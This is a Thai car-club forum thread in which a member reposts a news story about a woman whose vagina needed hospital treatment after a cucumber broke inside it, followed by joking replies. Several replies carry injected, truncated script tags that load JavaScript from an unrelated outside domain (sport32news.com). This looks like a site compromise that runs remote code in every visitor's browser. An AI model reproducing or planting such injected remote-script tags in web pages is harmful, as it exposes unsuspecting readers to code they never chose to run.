ตอบ
Pantamitr


ชื่อเล่น: ห่าน

เข้าร่วม: 27 พฤษภาคม 2010
ตอบ: 1622

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1792
ให้คำขอบคุณ: 1186

ที่อยู่: บางปู สมุทรปราการ
ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
พฤหัส, 24 ตุลา 2013 06:20 - สาวๆ ทั้งหลาย โดยเฉพาะ สาวอารมณ์เปลี่ยว ระวังให้ดี นี่เป็นอุทา(เห่า)หรณ์
http://www.manager.co.th/Local/ViewNews.aspx?NewsID=9510000084967
นครศรีธรรมราช - ม่ายสาวเมืองคอนใช้แตงกวาลูกใหญ่สอดใส่ช่องคลอด หักติดในอักเสบ วิ่งโร่ให้แพทย์ รพ.มหาราชช่วย หมอเตือนสุภาพสตรีใช้สิ่งของสอดใส่อวัยวะต้องระมัดระวังและคำนึงถึงความสะอาดปลอดภัยด้วย
       
       
       สำหรับเหตุการณ์ที่มีการวิพากษ์วิจารณ์กันอย่างสนุกปากในโรงพยาบาลมหาราช จ.นครศรีธรรมราช และประชาชนทั่วไปที่ทราบข่าวถูกเปิดเผยขึ้นเมื่อเช้าวันที่ 19 ก.ค. 2551 ประชาชนจำนวนมากที่เดินทางไปเฝ้าและเยี่ยมญาติๆ ที่ป่วยรักษาตัวอยู่ใน รพ.มหาราช ต่างจับกลุ่มวิพากษ์วิจารณ์เล่าลือกันอย่างกว้างขวางจากกรณีที่มีผู้ป่วยสาวใหญ่คนหนึ่งเดินทางมายังโรงพยาบาลมหาราช เมื่อเย็นวันที่ 18 ก.ค.2551 ที่ผ่านมา และขอให้แพทย์ช่วยนำสิ่งแปลกปลอมคือแตงกวาลูกใหญ่ที่หักติดอยู่ในช่องคลอดออกจากช่องคลอดให้ด้วย โดยในเบื้องต้นแพทย์ได้ทำการตรวจพบว่าในช่องคลอดของหญิงสาวคนดังกล่าวมีแตงกวาหักติดแน่นอยู่จึงใช้เครื่องมือแพทย์คีบออกมาได้
       
       ผู้สื่อข่าวจึงเดินทางไปยัง รพ.มหาราช เพื่อสอบถามข้อเท็จจริงที่เกิดขึ้น ซึ่งได้รับการยืนยันจากเจ้าหน้าที่ที่เกี่ยวข้องว่าเรื่องดังกล่าวเกิดขึ้นจริง แต่แพทย์และพยาบาลไม่สามารถเปิดเผยชื่อเสียงเรียงนาม รวมทั้งภูมิลำเนาที่อยู่อาศัยของคนไข้รายดังกล่าวได้ เนื่องจากจะส่งผลกระทบต่อชื่อเสียงของผู้ป่วยคนดังกล่าวจนอาจจะไม่สามารถดำรงชีพอยู่ในสังคมได้ตามปกติ แต่เพื่อเป็นอุทาหรณ์แพทย์จึงขอฝากเตือนผู้หญิงทั่วๆ ไป ที่คิดจะใช้สิ่งแปลกปลอมสอดใส่ในช่องคลอดเพื่อสำเร็จความใคร่ให้ใช้ความระมัดระวังและคำนึงถึงความปลอดภัยด้วย
       
       ผู้สื่อข่าวพยายามติดต่อกับนายแพทย์สมชาย นิ้มวัฒนากุล ผู้อำนวยการโรงพยาบาลมหาราช เพื่อสอบถามความคิดเห็นในเรื่องนี้แต่ไม่สามารถติดต่อได้ อย่างไรก็ตามนายแพทย์อิสระ หัสดินทร์ หรือ “หมอไก่” ผู้บริหารโรงพยาบาลนครพัฒน์ โรงพยาบาลเอกชนในจังหวัดนครศรีธรรมราช กล่าวว่า การใช้วัสดุอุปกรณ์เพื่อสำเร็จความใคร่ด้วยตัวเองนั้นในต่างประเทศถือเป็นเรื่องที่ธรรมดามาก ผู้หญิงในต่างประเทศสามารถเลือกซื้ออวัยวะเพศเทียมมาสอดใส่ในช่องคลอดเพื่อสำเร็จความใคร่ได้อย่างเปิดเผย แต่ในสังคมไทยยังไม่ยอมรับในเรื่องเหล่านี้และเป็นถือเป็นเรื่องที่น่าอับอายถูกตั้งข้อรังเกียจ ผู้หญิงไทยจึงต้องปกปิดเรื่องในลักษณะนี้ ดังนั้น เมื่อมีอารมณ์ความต้องการทางเพศจึงมักจะหยิบฉวยวัสดุอุปกรณ์ที่พอจะหาได้สอดใส่เข้าไปในช่องคลอดเพื่อสำเร็จความใคร่ ทำให้เสี่ยงต่อการเกิดอันตรายกับช่องคลอดและอวัยวะเพศได้
       
       “สำหรับคนไข้รายนี้ที่ใช้แตงกวาและหักติดอยู่ในช่องคลอด ในความเป็นจริงน่าจะเอาออกเองได้ แต่ผู้ป่วยอาจจะใช้แตงกวาขนาดใหญ่เกินไปและคงจะตกใจมากที่แตงกวาหักติดในช่องคลอดจนอาจจะทำให้เกิดการบีบรัดตัวของกล้ามเนื้อในช่องคลอดจนไม่สามารถนำแตงกวาออกเองได้ และรีบเดินทางมาพบแพทย์เพื่อให้ช่วยเอาแตงกว่าออกให้ดังกล่าว”
       
       นายแพทย์อิสระ หัสดินทร์ กล่าวอีกว่า อยากจะแนะนำผู้หญิงทั่วๆ ไปว่า หากจำเป็นที่จะต้องสำเร็จความใคร่โดยใช้วัสดุอุปกรณ์มาช่วยเสริมนั้น สิ่งที่ควรคำนึงและระมัดระวัง คือ ชนิดและขนาดของวัสดุที่จะใช้ ไม่ควรมีขนาดใหญ่เกินไปและจะต้องไม่ใช่ของแข็ง และต้องไม่มีเหลี่ยม หรือความคมที่ทำให้ช่องคลอดฉีกขาด ที่สำคัญวัสดุดังกล่าวต้องมีความยืดหยุ่นได้พอสมควร เรื่องของความสะอาดผู้ใช้จะต้องทำความสะอาดให้ดีที่สุด เนื่องจากในอวัยวะเพศมีสภาพที่ติดเชื้อได้ง่ายมาก การกระทำเมื่อสอดใส่เข้าไปแล้ว ต้องทำอย่างระมัดระวังไม่หักโหมรุนแรงมากเกินไป
       
       นายแพทย์อิสระยังฝากเตือนว่าในรายนี้เลือกใช้แตงกวาแม้จะเป็นของแข็งแต่ยืดหยุ่นได้พอสมควร แต่ผลผลิตทางการเกษตรในปัจจุบันมีการใช้สารเคมีในกระบวนการผลิต หากนำมาสอดใส่ในช่องคลอดโดยไม่สะอาดเพียงพอก็จะทำให้ติดเชื้อในช่องคลอดได้ง่ายขึ้น จึงต้องระมัดระวังเป็นพิเศษด้วย
       
       สำหรับกรณีนี้ถูกเปิดเผยขึ้นเมื่อเย็นวันที่ 18 ก.ค.2551 ได้มีผู้ป่วยคนหนึ่งเดินทางด้วยรถโดยสารประจำทางมาลงรถที่ป้ายจอดรถประจำทางหน้า รพ.มหาราช จากนั้นจึงเดินข้ามถนนเข้ามาในโรงพยาบาลมาอย่างอิดโรย เจ้าหน้าที่เข็นเปลคนไข้ต้องรีบออกไปประคอง และนำมาทำบัตรคนไข้โดยผู้ป่วยคนดังกล่าวอายุ 36 ปี เป็นแม่ม่ายเลิกรากับสามีมานาน 6 ปีแล้ว เมื่อช่วง 2 วันก่อนมาโรงพยาบาลมีอารมณ์ทางเพศ จึงนำแตงกวาลูกใหญ่เส้นรอบวงประมาณ 6 นิ้ว ยาวประมาณ 10 นิ้วสอดใส่เข้าไปในอวัยวะเพศเพื่อสำเร็จความใคร่ แต่ทำให้แตงกวาหักติดอยู่ในช่องคลอดยาวประมาณ 3-4 นิ้ว ผู้ป่วยรายนี้พยายามที่จะใช้มือล้วงเข้าไปในช่องคลอดเพื่อดึงแตงกวาออกแต่ไม่สามารถนำออกมาได้ แม้ผู้ป่วยรายนี้จะพยายามทุกวิถีทางที่จะเอาแตงกวาออก แต่ไม่สำเร็จจนช่องคลอดและอวัยวะเพศเกิดการอักเสบบวมเป่ง ผู้ป่วยรายนี้ตกใจเกรงว่าหากปล่อยเอาไว้อาจจะส่งผลกระทบร้ายแรงได้จึงตัดสินใจเดินทางมาขอความช่วยเหลือจากแพทย์ รพ.มหาราช ให้ช่วยนำแตงกวาออกมา
       
       นางอ้อย (ขอสงวนนามสกุล) เปิดเผยว่า ในช่วงที่สาวรายนี้ไปให้แพทย์ช่วยที่โรงพยาบาลตนไปเยี่ยมญาติที่ป่วยอยู่ที่ รพ.มหาราช และพบเห็นเหตุการณ์พอดี โดยทราบว่าแม่ม่ายสาวคนดังกล่าวเป็นคนที่มีภูมิลำเนาอยู่อำเภอหนึ่งในแถบลุ่มน้ำปากพนัง ในครั้งแรกเดินเข้ามาในโรงพยาบาลในลักษณะกุมหน้าท้องเอาไว้ จึงคิดว่าเจ็บท้องคลอด แต่ท้องไม่ใหญ่เหมือนคนท้องโดยทั่วไป จนเมื่อไปทำบัตรคนไข้ผู้ป่วยรายนี้ก็ยังอ้ำๆ อึ้งๆ บอกแค่เพียงว่าเจ็บบริเวณอวัยวะเพศและหน้าท้อง เมื่อนำเข้าห้องฉุกเฉินผู้ป่วยจึงยอมบอกเรื่องจริงโดยเล่าเรื่องให้แพทย์และพยาบาลฟังอย่างละเอียดทำให้แพทย์และนางพยาบาลถึงกับขำไม่ออก จากนั้นแพทย์และพยาบาลจึงลงมือช่วยผู้ป่วยจนสามารถเอาแตงกวาหักท่อนยาวประมาณ 4 นิ้วออกมาจากช่องคลอดของผู้ป่วยได้สำเร็จ และแพทย์ได้จัดยาแก้อักเสบและยาฆ่าเชื้อให้แก่ผู้ป่วยและแม่ม่ายคนดังกล่าวได้รีบออกจากโรงพยาบาลไปอย่างรวดเร็ว
       
       นางอ้อย เล่าต่อว่า หลังแพทย์ช่วยเอาแตงกวาออกจากช่องคลอดผู้ป่วยรายนี้จนสำเร็จแล้ว ตนได้ยินแพทย์สั่งผู้ป่วยว่าขอให้ระมัดระวังการนำสิ่งแปลกปลอมสอดใส่เข้าไปในช่องคลอด เพื่อสำเร็จความใคร่ ซึ่งจะต้องกระทำด้วยความระมัดระวังทั้งในเรื่องของขนาดของสิ่งที่จะนำสอดใส่เข้าในในช่องคลอด เรื่องของความสะอาด และวิธีการสอดใส่ นอกจากเรื่องการหักติดในช่องคลอดแล้ว ในเรื่องความสะอาดก็เป็นเรื่องที่ควรให้ความสำคัญให้มากๆ โดยเฉพาะในปัจจุบันแตงกวา มะเขือยาว หรือพืชผักอื่นๆ นั้นจะมีกรรมวิธีการในการปลูกที่ส่วนใหญ่จะสารเคมีทั้งในส่วนของปุ๋ยและยาฆ่าแมลงทำให้มีสารเคมีตกค้างอยู่ที่ผิวของผลผลิตหากทำความสะอาดไม่ดี เมื่อนำมาสอดใส่ในช่องคลอดสารเคมีจะออกฤทธิ์ทำให้ช่องคลอดแสบร้อน คัน และอักเสษช้ำบวม เป็นหนองในที่สุดและหากไม่ไปพบแพทย์หรือพบแพทย์ช้าอาจจะส่งผลกระทบรุนแรงในระบบสืบพันธุ์ได้
       
       “แพทย์ยังได้ฝากเตือนผู้หญิงทั่วๆ ไปว่า การสำเร็จความใคร่กระทำได้หลายวิธี หากคิดจะเลือกการใช้สิ่งแปลกปลอมสอดใส่เข้าไปในช่องคลอดก็ควรเลือกใช้วัสดุที่มั่นใจในความปลอดภัย และอวัยวะเพศเทียมจะปลอดภัยกว่าการใช้แตงกวา มะเขือยาว หรือแครอต ผู้ป่วยรายนี้ยังบอกกับแพทย์ว่าใช้แตงกวาสอดใส่ในช่องคลอดเพื่อสำเร็จความใคร่มานาน 4-5 ปีแล้วไม่เคยมีปัญหา เพิ่งจะมามีปัญหาหักติดในช่องคลอดเป็นครั้งแรก” นางอ้อยกล่าว
       
       ผู้สื่อข่าวรายงานว่า สำหรับข่าวคราวในลักษณะนี้เคยเกิดขึ้นมาครั้งหนึ่งเมื่อหลายปีก่อนนี้ เมื่อหนุ่มใหญ่ชาว ต.กะปาง อ.ทุ่งสง จ.นครศรีธรรมราช เกิดคิดพิเรนทร์ใช้นอตตัวเมียขนาดใหญ่สวมเป็นปลอกเข้าไปในที่อวัยวะเพศของตัวเอง และไม่สามารถนำกลับออกมาได้ ส่งผลให้อวัยวะเพศซ้ำบวมอย่างหนัก เพื่อนๆ ต้องช่วยกันหามส่ง รพ.ทุ่งสง ก่อนส่งต่อมายัง รพ.มหาราช ในครั้งนั้นนายแพทย์ประวิง เอื้อนนนทัช ต้องคิดหนักในการหาทางนำน็อตออกจากอวัยวะเพศ เพราะหากใช้หินเจียรนอตออกความร้อนอาจจะทำลายระบบประสาทที่อวัยวะเพศจนหมดสมรรถภาพทางเพศใช้งานไม่ได้ตลอดชีวิต ในที่สุดตัดสินใจฉีดยาชาก่อนจะดึงนอตออกจนอวัยวะเพศฉีกและใช้วีการรักษาแผลเอาภายหลัง ซึ่งอวัยวะเพศของหนุ่มพิเรนทร์สามารถกลับมาใช้งานได้ตามปกติ แต่ตกเป็นข่าวใหญ่โตเป็นที่วิพากษ์วิจารณ์กันอย่างกว้างขวางสนุกปากมาแล้ว
ได้รับคำขอบคุณจาก: black_civic_es  kkw  domziia  Chonchy  bangkean_tum  Cool_M  nayyai1  Thetom  Doraeman  POP_ES05  hacker 
kkw


ชื่อเล่น: โต้ง

เข้าร่วม: 16 กันยา 2012
ตอบ: 459

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 475
ให้คำขอบคุณ: 794

ที่อยู่: ลาดพร้าว 120
ปี: 2003
สี: แดง แรลไล (R-513)
พฤหัส, 24 ตุลา 2013 06:52 - สาวๆ ทั้งหลาย โดยเฉพาะ สาวอารมณ์เปลี่ยว ระวังให้ดี นี่เป็นอุทา(เห่า)หรณ์
..
ได้รับคำขอบคุณจาก: Pantamitr 
pukzone


เข้าร่วม: 11 ตุลา 2011
ตอบ: 721

Guru ES
Guru ES

ได้รับคำขอบคุณ: 708
ให้คำขอบคุณ: 184

ที่อยู่: กทม.
ปี: 2001
สี: น้ำเงิน อิเทอนอล (B-96P)
พฤหัส, 24 ตุลา 2013 07:34 - สาวๆ ทั้งหลาย โดยเฉพาะ สาวอารมณ์เปลี่ยว ระวังให้ดี นี่เป็นอุทา(เห่า)หรณ์
..
ได้รับคำขอบคุณจาก: Pantamitr 
Parongong


ชื่อเล่น: เว่อร์

เข้าร่วม: 08 กันยา 2013
ตอบ: 518

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 462
ให้คำขอบคุณ: 11

ปี: 2001
สี: น้ำเงิน อิเทอนอล (B-96P)
พฤหัส, 24 ตุลา 2013 07:37 - สาวๆ ทั้งหลาย โดยเฉพาะ สาวอารมณ์เปลี่ยว ระวังให้ดี นี่เป็นอุทา(เห่า)หรณ์
..
ได้รับคำขอบคุณจาก: Pantamitr 
aumlight


ชื่อเล่น: อั้ม

เข้าร่วม: 27 พฤษภาคม 2013
ตอบ: 925

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 675
ให้คำขอบคุณ: 155

ที่อยู่: ES เมืองทอง
ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
พฤหัส, 24 ตุลา 2013 07:54 - สาวๆ ทั้งหลาย โดยเฉพาะ สาวอารมณ์เปลี่ยว ระวังให้ดี นี่เป็นอุทา(เห่า)หรณ์
....
ได้รับคำขอบคุณจาก: Pantamitr 
chutipong


ชื่อเล่น: เอ็ม คับผม

เข้าร่วม: 07 กุมภา 2013
ตอบ: 785

Guru ES
Guru ES

ได้รับคำขอบคุณ: 908
ให้คำขอบคุณ: 352

ที่อยู่: แถวบางนาสำโรง
ปี: 2002
สี: ทอง เดเสิร์ท มิสท์ (เมทัลลิก) (YP-538M)
พฤหัส, 24 ตุลา 2013 08:49 - สาวๆ ทั้งหลาย โดยเฉพาะ สาวอารมณ์เปลี่ยว ระวังให้ดี นี่เป็นอุทา(เห่า)หรณ์
....
ได้รับคำขอบคุณจาก: Pantamitr 
ConDomMaN


ชื่อเล่น: โอ๋

เข้าร่วม: 24 สิงหา 2012
ตอบ: 192

มือใหม่หัดขับ
มือใหม่หัดขับ

ได้รับคำขอบคุณ: 123
ให้คำขอบคุณ: 28

ปี: 2001
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
พฤหัส, 24 ตุลา 2013 09:48 - สาวๆ ทั้งหลาย โดยเฉพาะ สาวอารมณ์เปลี่ยว ระวังให้ดี นี่เป็นอุทา(เห่า)หรณ์
..
ได้รับคำขอบคุณจาก: Pantamitr 
davidian


ชื่อเล่น: เอ็ม

เข้าร่วม: 02 พฤศจิกา 2012
ตอบ: 1424

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2420
ให้คำขอบคุณ: 4730

ที่อยู่: บางสิบหมื่น ชลบุรี -แปดริ้ว ฉะเชิงเทรา-บางนา สมุทรปราการ
ปี: 2005
สี: เทา ซิลเวอร์สโตน (NH-630M)
พฤหัส, 24 ตุลา 2013 10:07 - สาวๆ ทั้งหลาย โดยเฉพาะ สาวอารมณ์เปลี่ยว ระวังให้ดี นี่เป็นอุทา(เห่า)หรณ์
กำแท้ๆ
ได้รับคำขอบคุณจาก: Pantamitr 
song


เข้าร่วม: 10 กุมภา 2011
ตอบ: 9833

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5558
ให้คำขอบคุณ: 4415

ที่อยู่: ESเมืองทอง 100%
ปี: 2002
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
พฤหัส, 24 ตุลา 2013 10:09 - สาวๆ ทั้งหลาย โดยเฉพาะ สาวอารมณ์เปลี่ยว ระวังให้ดี นี่เป็นอุทา(เห่า)หรณ์
น่าจะเอามาจิ่มน้ำพริกมากกว่านะ
ได้รับคำขอบคุณจาก: Pantamitr 
aonjang237


ชื่อเล่น: อ้น

เข้าร่วม: 11 มิถุนา 2013
ตอบ: 812

Guru ES
Guru ES

ได้รับคำขอบคุณ: 555
ให้คำขอบคุณ: 130

ที่อยู่: อ.ด่านช้าง จ.สุพรรณบุรี
ปี: 2002
พฤหัส, 24 ตุลา 2013 10:14 - สาวๆ ทั้งหลาย โดยเฉพาะ สาวอารมณ์เปลี่ยว ระวังให้ดี นี่เป็นอุทา(เห่า)หรณ์
..
ได้รับคำขอบคุณจาก: Pantamitr 
tokykung


ชื่อเล่น: ต๊อก

เข้าร่วม: 27 ตุลา 2008
ตอบ: 2490

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2660
ให้คำขอบคุณ: 5788

ที่อยู่: เชียงราย
ปี: 2002
พฤหัส, 24 ตุลา 2013 10:42 - สาวๆ ทั้งหลาย โดยเฉพาะ สาวอารมณ์เปลี่ยว ระวังให้ดี นี่เป็นอุทา(เห่า)หรณ์
แตงกวา.....ดอง.....
ได้รับคำขอบคุณจาก: Pantamitr 
Vee


ชื่อเล่น: วีครับ

เข้าร่วม: 18 กันยา 2013
ตอบ: 2999

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1210
ให้คำขอบคุณ: 2387

ที่อยู่: นครปฐม@นวมินทร์
ปี: 2003
สี: ฟ้า ไอซ์บูล (เมทัลลิก) (B-506M)
พฤหัส, 24 ตุลา 2013 10:43 - สาวๆ ทั้งหลาย โดยเฉพาะ สาวอารมณ์เปลี่ยว ระวังให้ดี นี่เป็นอุทา(เห่า)หรณ์
..
ได้รับคำขอบคุณจาก: Pantamitr 
Cool_M


ชื่อเล่น: แม็ก

เข้าร่วม: 18 ธันวา 2012
ตอบ: 1928

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2509
ให้คำขอบคุณ: 2304

ที่อยู่: ปราจีนบุรี - กำแพงเพชร - ปราจีนบุรี
ปี: 2002
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
พฤหัส, 24 ตุลา 2013 11:44 - สาวๆ ทั้งหลาย โดยเฉพาะ สาวอารมณ์เปลี่ยว ระวังให้ดี นี่เป็นอุทา(เห่า)หรณ์
...
ได้รับคำขอบคุณจาก: Pantamitr 
Jasada


ชื่อเล่น: เป็นเต้

เข้าร่วม: 10 มกรา 2011
ตอบ: 571

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 520
ให้คำขอบคุณ: 693

ที่อยู่: 15/41 ม.3 ต.เนินพระ อ.เมือง จ.ระยอง
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
พฤหัส, 24 ตุลา 2013 11:49 - สาวๆ ทั้งหลาย โดยเฉพาะ สาวอารมณ์เปลี่ยว ระวังให้ดี นี่เป็นอุทา(เห่า)หรณ์
ช๊อค
ได้รับคำขอบคุณจาก: Pantamitr 
nayyai1


เข้าร่วม: 01 กันยา 2010
ตอบ: 405

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 650
ให้คำขอบคุณ: 509

ที่อยู่: ระยอง ตอนนี้โคราชแล้ว
ปี: 2005
สี: เทา ซิลเวอร์สโตน (NH-630M)
พฤหัส, 24 ตุลา 2013 12:31 - สาวๆ ทั้งหลาย โดยเฉพาะ สาวอารมณ์เปลี่ยว ระวังให้ดี นี่เป็นอุทา(เห่า)หรณ์
ความหื่นเป็นเหตุ 555
ได้รับคำขอบคุณจาก: Pantamitr 
porche35


ชื่อเล่น: บอย

เข้าร่วม: 22 สิงหา 2013
ตอบ: 1098

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 797
ให้คำขอบคุณ: 329

ที่อยู่: ES SAMUTPRAKAN
ปี: 2005
สี: น้ำเงิน อิเทอนอล (B-96P)
พฤหัส, 24 ตุลา 2013 12:40 - สาวๆ ทั้งหลาย โดยเฉพาะ สาวอารมณ์เปลี่ยว ระวังให้ดี นี่เป็นอุทา(เห่า)หรณ์
..
ได้รับคำขอบคุณจาก: Pantamitr 
พุธโคราช


เข้าร่วม: 17 กันยา 2013
ตอบ: 370

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 257
ให้คำขอบคุณ: 86

ปี: 2001
สี: แดง รอยัล รูบี้ (มุก) (R-522P)
พฤหัส, 24 ตุลา 2013 12:41 - สาวๆ ทั้งหลาย โดยเฉพาะ สาวอารมณ์เปลี่ยว ระวังให้ดี นี่เป็นอุทา(เห่า)หรณ์
มันเป็นความสามารถเฉพาะตัวนะครับ ระวังกันหน่อย
ได้รับคำขอบคุณจาก: Pantamitr 
N_J Civic


เข้าร่วม: 27 ตุลา 2009
ตอบ: 3806

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5146
ให้คำขอบคุณ: 5687

ที่อยู่: นิคม304 - ปราจีน - ชัยภูมิ
ปี: 2003
สี: เทา ซิลเวอร์สโตน (NH-630M)
พฤหัส, 24 ตุลา 2013 12:45 - สาวๆ ทั้งหลาย โดยเฉพาะ สาวอารมณ์เปลี่ยว ระวังให้ดี นี่เป็นอุทา(เห่า)หรณ์
ถึงขั้นแตงกวาหัก....
ได้รับคำขอบคุณจาก: Pantamitr 
Rachen


ชื่อเล่น: เชน

เข้าร่วม: 03 พฤศจิกา 2012
ตอบ: 1422

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1495
ให้คำขอบคุณ: 2881

ที่อยู่: บ้านฉาง ระยอง และ สตาร์พลาซ่า ระยอง
ปี: 2003
สี: เทา ซิลเวอร์สโตน (NH-630M)
พฤหัส, 24 ตุลา 2013 12:51 - สาวๆ ทั้งหลาย โดยเฉพาะ สาวอารมณ์เปลี่ยว ระวังให้ดี นี่เป็นอุทา(เห่า)หรณ์
ทามไมไม่ใช้ มะระ อ่า<script src="https://sport32news.com/civicesgroup.js"></
ได้รับคำขอบคุณจาก: Pantamitr 
Pantamitr


ชื่อเล่น: ห่าน

เข้าร่วม: 27 พฤษภาคม 2010
ตอบ: 1622

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1792
ให้คำขอบคุณ: 1186

ที่อยู่: บางปู สมุทรปราการ
ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
พฤหัส, 24 ตุลา 2013 13:33 - สาวๆ ทั้งหลาย โดยเฉพาะ สาวอารมณ์เปลี่ยว ระวังให้ดี นี่เป็นอุทา(เห่า)หรณ์
song พิมพ์ว่า:
น่าจะเอามาจิ่มน้ำพริกมากกว่านะ

<script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></ ถ้าเอาไอ้่ท่อนที่หัก ไปจิ้มน้ำพริก รสชาดมันจะเป็นยังไงน้อ

 
AUM_Love_civic


ชื่อเล่น: อั้ม

เข้าร่วม: 27 กรกฎา 2013
ตอบ: 913

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 643
ให้คำขอบคุณ: 328

ที่อยู่: น่าน ปัจจุบัน อยู่ชลบุรี
ปี: 2001
สี: ทอง แซทเทิลไลท์ (NH-663M)
พฤหัส, 24 ตุลา 2013 13:41 - สาวๆ ทั้งหลาย โดยเฉพาะ สาวอารมณ์เปลี่ยว ระวังให้ดี นี่เป็นอุทา(เห่า)หรณ์
ถึงขั้นหักคากันเลย<script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></
ได้รับคำขอบคุณจาก: Pantamitr 
nong_fb


ชื่อเล่น: ภพ

เข้าร่วม: 15 มีนา 2013
ตอบ: 378

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 306
ให้คำขอบคุณ: 216

ที่อยู่: น่าน - บางปู สมุทรปราการ
ปี: 2001
สี: ทอง เดเสิร์ท มิสท์ (เมทัลลิก) (YP-538M)
พฤหัส, 24 ตุลา 2013 14:24 - สาวๆ ทั้งหลาย โดยเฉพาะ สาวอารมณ์เปลี่ยว ระวังให้ดี นี่เป็นอุทา(เห่า)หรณ์
........
ได้รับคำขอบคุณจาก: Pantamitr 
Peter


เข้าร่วม: 03 กันยา 2011
ตอบ: 657

Guru ES
Guru ES

ได้รับคำขอบคุณ: 344
ให้คำขอบคุณ: 17

ที่อยู่: N_k_e_S_a_r_a_b_u_R_I
ปี: 2001
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
จันทร์, 4 พฤศจิกา 2013 03:30 - สาวๆ ทั้งหลาย โดยเฉพาะ สาวอารมณ์เปลี่ยว ระวังให้ดี นี่เป็นอุทา(เห่า)หรณ์
ถึงขั้นแตกหักกันเลยใจร้ายจัง
Supap


เข้าร่วม: 26 พฤศจิกา 2012
ตอบ: 950

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 469
ให้คำขอบคุณ: 144

ที่อยู่: ศรีราชา ชลบุรี
ปี: 2003
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
จันทร์, 4 พฤศจิกา 2013 10:07 - สาวๆ ทั้งหลาย โดยเฉพาะ สาวอารมณ์เปลี่ยว ระวังให้ดี นี่เป็นอุทา(เห่า)หรณ์
ตำเเตงหอยดอง..อิอิ
ตอบ
หน้า 1 จาก 1
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2024 Civic ES Group. All rights reserved.